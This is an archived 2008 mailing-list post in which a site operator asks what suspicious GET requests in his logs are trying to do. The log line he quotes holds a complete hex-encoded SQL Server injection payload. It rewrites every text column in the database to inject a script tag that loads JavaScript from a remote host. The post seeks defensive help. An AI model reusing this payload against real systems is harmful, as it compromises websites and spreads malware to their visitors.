Commands Sent to an FeaReferenceModelOntology from Adrian Walker on 2008-08-15 (semantic-web@w3.org from August 2008)

From: Adrian Walker <adriandwalker@gmail.com>
Date: Fri, 15 Aug 2008 13:42:12 -0400
To: semantic_web@googlegroups.com, SW-forum <semantic-web@w3.org>, semanticweb@yahoogroups.com, "[ontolog-forum]" <ontolog-forum@ontolog.cim3.net>
Message-ID: <1e89d6a40808151042s1218466ua66417ad160466fb@mail.gmail.com>

Hi All --

Your expert advice please.

On our website [1], we support a kind of Wiki for business rules and facts,
written in executable English.

The site can also be used as an SOA endpoint.

One of the sets of rules and facts on the site is a version of the
FeaReferenceModelOntology.

We are seeing incoming GET commands like the one listed below.

 [15/Aug/2008:13:10:57 -0400] "GET
/demo_agents/FeaReferenceModelOntology2.agent?;DeCLARE%20@S
%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S);
HTTP/1.1" 200 620290

The commands originate from many different sites around the internet, and we
have not been able to find out why they are being sent.

Does anyone know please what these commands are trying to do?  Or are they
simply buffer overflow attack attempts?

Thanks for your kind thoughts about this, and apologies for cross posting.

                                                   -- Adrian

[1]  Internet Business Logic
A Wiki and SOA Endpoint for Executable Open Vocabulary English over SQL and
RDF
Online at www.reengineeringllc.com    Shared use is free

Adrian Walker
Reengineering

Received on Friday, 15 August 2008 17:42:49 UTC